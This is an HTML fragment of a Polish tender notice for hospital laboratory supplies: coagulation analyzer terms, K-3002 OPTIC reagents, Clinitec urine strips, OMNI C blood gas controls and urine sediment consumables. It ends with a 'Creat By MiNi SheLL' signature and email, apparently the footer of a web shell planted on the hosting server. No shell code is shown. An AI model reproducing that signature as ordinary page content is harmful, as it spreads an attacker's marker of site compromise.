ilość badań w okresie obowiązywania umowy: 11 559

Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający dla prawidłowego wykonania w/w ilości oznaczeń. W przypadku nieuwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do zamawiającego.

2. Materiały zużywalne
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający dla prawidłowego wykonania w/w ilości oznaczeń. W przypadku nieuwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do zamawiającego.

Warunki graniczne dot. Pakietu nr 5
1. Analizator wyprodukowany w latach 2008-2012
2. Oznaczenia parametrów hemostazy: Minimum:
- PT (czas, wskaźnik PT, INR)
- APTT (czas, ratio)
3. Stosowane metody pomiaru:
- nefelometria
- metoda chromogenna
- turbidymetria
4. Możliwość jednoczesnego wykonywania różnych testów (PT i APTT)
5. Możliwość pracy z próbkami pierwotnymi. Identyfikacja próbek przy pomocy kodów kreskowych
6. Metoda mikro - możliwość wykonania pojedynczego oznaczenia z 50 mikrolitrów osocza
7. Wydajność analizatora do 50 testów na godzinę
8. Zautomatyzowany proces analityczny:
- automatyczna kalibracja
- automatyczne rozcieńczanie kalibratorów
- automatyczne pobieranie i utylizacja kuwet pomiarowych
9. Możliwość podglądu krzywych reakcyjnych
10. Możliwość dwukierunkowej komunikacji z systemem informatycznym (LIS) w czasie rzeczywistym
11. Bezpłatne podłączenie i konfiguracja aparatu do LIS (e-lab firmy Eclipse)
12. Serwis: - czas reakcji: przyjęcie zgłoszenia/podjęcie naprawy 24/48 godzin
13. Tromboplastyna o ISI zbliżonym do 1,0
14. Częstotliwość kalibracji: nie częściej niż raz na daną serię odczynnika
15. Data ważności dostarczanych odczynników nie krótsza niż 6 miesięcy
16. Możliwość zamrażania kalibratorów
17. Materiały kontrolne: mianowane, z możliwością zamrożenia
18. Bezpłatny serwis w okresie umowy
19. Bezpłatna aktualizacja oprogramowania w okresie trwania umowy
Nie spełnienie wymaganych parametrów i warunków spowoduje odrzucenie oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7, 33.69.65.00-0, 38.43.45.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Dostawa odczynników i materiałów zużywalnych do badań układu krzepnięcia wykonywanych na koagulometrze K-3002 OPTIC.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odczynniki i materiały zużywalne
1. Zestaw do oznaczania czasu protrombinowego - PT
- Tromboplastyna
- Odczynnik liofilizowany z rozpuszczalnikiem w zestawie 
- Wartość ISI oraz MNPT na koagulometr K-3002 OPTIC, wyznaczone przez producenta odczynników potwierdzone ulotką dla danej serii odczynnika
- maksymalna objętość fiolki z odczynnikiem 10 ml
- stabilność odczynnika roboczego w 2-8°C - minimum 12 dni
2. Zestaw do oznaczania czasu kaolinowo-kefalinowego - APTT	
- Odczynnik ciekły, gotowy do użycia
- chlorek wapnia w zestawie 
- objętość fiolki z odczynnikiem - do 2 ml
- wartość średniego czasu kontrolnego na koagulometr K-3002 OPTIC, wyznaczone przez producenta odczynników potwierdzone ulotką dla danej serii odczynnika
3. Osocze kontrolne
- Materiał kontrolny na dwóch poziomach - normalnym i patologicznym
- Mozliwość wykonania na jednym materiale pomiarów kontrolnych dla:
PT
APTT
Fibrynogenu
- Stabilność materiału kontrolnego po rozpuszczeniu - minimum 8 godzin w temp. 2-8°C
- wartości metrykalne czasu kontrolnego na koagulometr K-3002 OPTIC, wyznaczone przez producenta odczynników potwierdzone ulotką dla danej serii odczynnika
4. Probówki do koagulometru
- Probówki umożliwiające pracę na koagulometrze K 3002 OPTIC. Opakowanie minimum 1000 szt.

Zakładane ilości badań w okresie trwania umowy (24 miesiące):
PT - 5100
APTT - 420

Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający dla prawidłowego wykonania w/w ilości oznaczeń. W przypadku nieuwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do zamawiającego.

2. Przeglądy serwisowe koagulometru
1. Przegląd koagulometru K-3002 OPTIC - ilość: 2

Wymagane parametry odczynników dot. Pakietu nr 6
1. Możliwość zastosowania odczynników do wykonywania badań na koagulometrze K-3002 OPTIC
2. W przypadku zaoferowania odczynników innych niż polecane przez producenta aparatu K-3002 OPTIC należy dostarczyć aplikacje odczynnikowe dla aparatu K-3002 OPTIC
3. Data ważności dostarczanych odczynników nie może być krótsza nić 6 miesięcy
4. Wielkość opakowań odczynników dobrana tak by umożliwić ich całkowite i proporcjonalne zużycie
5. Materiały kontrolne z wartościami metrykalnymi określonymi dla koagulometru K-3002 OPTIC
Niespełnienie wymaganych parametrów i warunków spowoduje odrzucenie oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7, 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Dostawa pasków do badań fizykochemicznych moczu kompatybilnych z czytnikiem Clinitec Status.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Paski do badania moczu 10 parametrowe (leukocyty; azotyny; urobilinogen; białko; pH, ciężar właściwy; ketony; bilirubina; glukoza) kompatybilne z czytnikiem Clinitec Status
ilość: 16 500 szt.
2. Paski do badania moczu 2 parametrowe - glukoza i ketony do odczytu wizualnego
ilość: 2 000 szt.
3. Mocz kontrolny - 2 poziomy
ilość: 2x730 ozn.

Wymagane parametry odczynników dot. Pakietu nr 7
1. Paski do badania moczu 10 parametrowe (leukocyty; azotyny; urobilinogen; białko; pH, ciężar właściwy; ketony; bilirubina; glukoza) kompatybilne z czytnikiem Clinitec Status
2. Paski do badania moczu 2 parametrowe - glukoza i ketony do odczytu wizualnego i metody manualnej
3. Mocz kontrolny - ciekły roztwór stymulujący mocz ludzki, poziomy kontroli - normalny, patologiczny. Stabilność materiału po otwarciu - minimum 20 dni
Niespełnienie wymaganych parametrów i warunków spowoduje odrzucenie oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Materiały kontrolne do analizatora RKZ OMNI C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Materiał kontrolny - pH odpowiadające kwasicy - ilość: 480 amp
2. Materiał kontrolny - pH odpowiadające zakresowi fizjologicznemu - ilość: 480 amp
3. Materiał kontrolny - pH odpowiadające zasadowicy - ilość: 480 amp

Wymagane parametry odczynników dot. Pakietu nr 8
1. Materiał w postaci roztworu wodnego
2. Wartość metrykalne pH, pCO2, pO2, oraz stężenia Na, K, Cl, Ca zjonizowanego wyznaczone przez producenta materiału dla analizatora Omni C
3. 3 poziomy materiału kontrolnego z pH odpowiadającym kwasicy, zasadowicy oraz stanowi fizjologicznemu pH
Niespełnienie wymaganych parametrów i warunków spowoduje odrzucenie oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - Dostawa sprzętu do analizy osadu moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Probówki do wirowania moczu z PS pojemności 12 ml z wgłębieniem na 0,5 ml odwirowanego osadu - ilość: 16 500 Szt.
2. Kamery z akrylu z 10 komorami z siatką pomiarową (8x20 pól) z polami w kształcie kwadratów (0,25x0,25mm) - ilość: 1 700 Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com